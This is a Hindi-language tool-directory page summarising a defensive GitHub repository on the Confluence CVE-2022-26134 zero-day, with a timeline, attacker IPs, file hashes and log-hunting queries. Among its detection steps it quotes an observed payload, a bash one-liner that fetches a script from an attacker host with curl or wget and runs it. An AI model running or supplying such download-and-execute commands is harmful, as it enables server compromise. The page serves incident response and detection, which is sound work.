Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Confluence-CVE-2022-26134 — यह रिपॉजिटरी Atlassian Confluence के Zero-Day Exploitation के बारे में है, और यह SecOps या Blue Team के परिप्रेक्ष्य से इसके बचाव और विश्लेषण का दृष्टिकोण प्रस्तुत करती है। | Kitploit
उपकरण/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणशोषणफोरेंसिकवेब सुरक्षाखतरा खुफियाघुसपैठ का पता लगानालर्निंग और शिक्षाघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

यह रिपॉजिटरी Atlassian Confluence के Zero-Day Exploitation के बारे में है, और यह SecOps या Blue Team के परिप्रेक्ष्य से इसके बचाव और विश्लेषण का दृष्टिकोण प्रस्तुत करती है।

रिपॉजिटरी देखें
4484 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Confluence-CVE-2022-26134

यह रिपॉज़िटरी Atlassian Confluence के ज़ीरो-डे शोषण, इसकी सुरक्षा और एक SecOps या ब्लू टीम के दृष्टिकोण से विश्लेषण के बारे में बात करती है।

अनुक्रमणिका

  • परिचय
  • समयरेखा
  • एक्सप्लॉइट को समझना
  • IOCs की सूची
  • पहचान रणनीति
  • शमन योजनाएँ
  • संदर्भ

परिचय

संयुक्त राज्य अमेरिका में मेमोरियल डे सप्ताहांत के दौरान, Volexity ने अपने एक ग्राहक के दो इंटरनेट-फ़ेसिंग वेब सर्वरों से जुड़ी एक घटना प्रतिक्रिया जांच की, जो Atlassian Confluence Server सॉफ़्टवेयर चला रहे थे। जांच तब शुरू हुई जब होस्टों पर संदिग्ध गतिविधि का पता चला, जिसमें डिस्क पर JSP वेबशेल लिखे जाना शामिल था। Volexity ने तुरंत Volexity Surge Collect Pro का उपयोग करके Confluence Server सिस्टमों से सिस्टम मेमोरी और प्रमुख फ़ाइलें एकत्र कीं और उनका विश्लेषण किया। एकत्रित डेटा की गहन समीक्षा के बाद, Volexity यह निर्धारित करने में सक्षम था कि सर्वर से समझौता एक हमलावर द्वारा एक एक्सप्लॉइट लॉन्च करने के परिणामस्वरूप हुआ था, जिससे रिमोट कोड निष्पादन प्राप्त हुआ। बाद में Volexity उस एक्सप्लॉइट को पुनः बनाने और Confluence Server के पूरी तरह से अपडेटेड संस्करणों को प्रभावित करने वाली एक ज़ीरो-डे भेद्यता की पहचान करने में सक्षम था।

इस भेद्यता की खोज और सत्यापन के बाद, Volexity ने 31 मई, 2022 को प्रासंगिक विवरण रिपोर्ट करने के लिए Atlassian से संपर्क किया। Atlassian ने तब से भेद्यता की पुष्टि की है और बाद में इस मुद्दे को CVE-2022-26134 सौंपा है। यह Confluence Server और Data Center के वर्तमान संस्करणों पर काम करने की पुष्टि की गई है।

समयरेखा

  • 2 जून, 1300 PT (2000 UTC) की एक सलाहकार सूचना, खामी की प्रकृति का वर्णन नहीं करती है, और "वर्तमान सक्रिय शोषण" का पता चला है। कोई पैच उपलब्ध नहीं है।
  • Volexity ने 03/06/2022 (GMT) को confluence में एक ज़ीरो-डे खोजा
  • 03/06/2022 (GMT) को Atlassian ने
    • प्रभावित संस्करणों को स्पष्ट किया
    • एक WAF नियम जोड़ा
    • फिक्स उपलब्ध होने के लिए अनुमानित समय सीमा जोड़ी
  • 03/06/2022 को हमने इंटरनेट पर सक्रिय शोषण प्रयास और POCs जारी होते देखे हैं।
  • 03 Jun 2022 8 AM PDT (प्रशांत समय, -7 घंटे) को Atlassian ने प्रतिस्थापन jar और क्लास फ़ाइलों सहित शमन जानकारी प्रदान की
  • 03 Jun 2022 10 AM PDT (प्रशांत समय, -7 घंटे) को Atlassian ने फिक्स किए गए संस्करणों के साथ अपडेट किया और WAF नियम जोड़ने के बारे में अंतरिम सलाह हटा दी।
  • 03 Jun 2022 4 PM PDT (प्रशांत समय, -7 घंटे) को Atlassian ने रोलिंग अपग्रेड के साथ सीमा स्पष्ट करने के लिए अपडेट किया।

तकनीकी विवरण यहाँ देखें

एक्सप्लॉइट को समझना

  • इस एक्सप्लॉइट के कार्य सिद्धांत और विश्लेषण के विवरण को समझने के लिए आप Volexity ब्लॉग यहाँ देख सकते हैं
  • एक्सप्लॉइट और इसके उपचार को समझने के लिए यह वीडियो देखें

IOCs की सूची

  • चूंकि यह एक ज़ीरो-डे भेद्यता है, और इसे बहुत आसानी से एक्सप्लॉइट किया जा सकता है, इसलिए IOCs की कोई विशेष सूची नहीं है। समुदाय के शोध से यह देखा गया कि हमलावर ने एक्सप्लॉइट के बाद XMRIG, KINSING, MIRAI आदि तैनात करने का प्रयास किया।
  • एक्सप्लॉइट स्ट्रिंग में "लगता है" यह स्ट्रिंग ${ शामिल है। यह पैटर्न urlencoded नहीं है और URL SAFE नहीं है, इसलिए यह लॉग में $%7B के रूप में दिखाई देगा।
  • Veloxity ब्लॉग confluence फ़ाइल का उल्लेख करता है: noop.jsp
  • .jsp एक्सटेंशन वाले वेबशेल की उपस्थिति जिसमें कोई पथ विवरण नहीं है। उदाहरण के लिए यह
  • कुछ IP पते-
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • दुर्भावनापूर्ण noop.jsp के लिए फ़ाइल हैश
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • व्यापक Atlassian Confluence CVE-2022-26134 शोषण, विशेष रूप से कार्यशील पुष्टि, 4 जून, 2022 को देखा गया है। अद्वितीय IP यहाँ खोजें

पहचान रणनीति

  • यदि आपके पास एक इंटरनेट-फ़ेसिंग Confluence Server और Data Center है जो पैच नहीं किया गया है, तो इसे समझौता मानना बुद्धिमानी है।
  • डिस्क पर confluence पथ में .jsp एक्सटेंशन या कोई अन्य फ़ाइलों वाली नई फ़ाइलों की तलाश करें।
  • tomcat लॉग से संदिग्ध चाइल्ड प्रक्रियाओं की तलाश करें
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • (install directory)/logs/*.log में स्ट्रिंग ${ की तलाश करें
  • एक्सेस लॉग में egrep -a -i -f pattern.txt *.log का प्रयास करें जहां pattern.txt को ${ के रूप में सहेजा जाना चाहिए या बस grep "\${" log file path या grep "$%7B" log file path का प्रयास करें
  • हो सकता है कि आपके पास noop.js के लिए वेब अनुरोध आ रहे हों, इसलिए आप findstr -i noop.jsp "logpath" का प्रयास कर सकते हैं
  • आपके पास अलग-अलग इंस्टॉल निर्देशिकाएँ हो सकती हैं, इसलिए confluence_install_dir/work/Standalone/ निर्देशिका में $jspname_jsp.java खोजने का प्रयास करें। उदाहरण के लिए, यदि आपको hack.jsp नाम का एक शेल मिलता है, तो आपको hack_jsp.java देखना चाहिए। यदि आपको hack.jsp डिस्क पर नहीं मिलता है, तो वेब लॉग में इसके एक्सेस की तलाश करें। इससे पता चलेगा कि इसे कब एक्सेस/डिलीट किया गया था।
  • EQL क्वेरी process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' David द्वारा यहाँ वर्णित के रूप में पहचानने में मदद कर सकती है
  • वेब लॉग में इस सामान्य पेलोड bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash की तलाश करें
  • एक Suricata हस्ताक्षर यहाँ पाया जा सकता है
  • हर किसी का सेटअप अलग हो सकता है लेकिन Confluence में मुख्य रूप से केवल ये JSP फ़ाइलें होती हैं:
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

इसलिए ऊपर सूचीबद्ध नहीं की गई नई बनाई गई फ़ाइलों की तलाश करें

  • डिस्क पर सूचीबद्ध नहीं की गई और 200 प्रतिक्रियाओं वाली एक्सेस लॉग में फ़ाइलों की जाँच करें। इसके अलावा, जाँच करें कि क्या इनमें से किसी फ़ाइल को संशोधित किया गया है। विशेष रूप से noop.jsp लोकप्रिय है और यह आमतौर पर लगभग 103 बाइट्स का होता है।
  • यदि आपने पहचान लिया है कि noop.jsp फ़ाइल के बारे में अलर्ट किया गया है, तो यह पता लगाने के लिए इस स्क्रिप्ट का लाभ उठाएं कि क्या यह संदिग्ध है।
  • आप अपने लॉग पर संभावित खतरे के अभिनेता को देखने के लिए त्वरित स्कैन चलाने के लिए इस स्क्रिप्ट का उपयोग कर सकते हैं। नोट- इसका उपयोग करने से पहले IP की सूची सत्यापित की जानी चाहिए, साथ ही सूची विशेष नहीं है।
  • ./confluence/org/apache/jsp/ निर्देशिका में उन .java फ़ाइलों की तलाश करें जो वहां नहीं होनी चाहिए।
  • किसी भी होस्ट पर जहाँ आपने एक्सप्लॉइट प्रयास की पहचान की है, प्रक्रिया ट्री और प्रक्रिया निष्पादन की जाँच करें। आपको प्रक्रिया ट्री इस प्रकार देखना चाहिए- java->bash->python->bash
  • एक bash प्रक्रिया, जो एक python प्रक्रिया द्वारा उत्पन्न हुई है, जिसका पिता एक और bash प्रक्रिया थी और फिर java रूट प्रक्रिया का नाम। ऐसी तरह का निष्पादन पहचाना जाना चाहिए
टूल डाउनलोड करें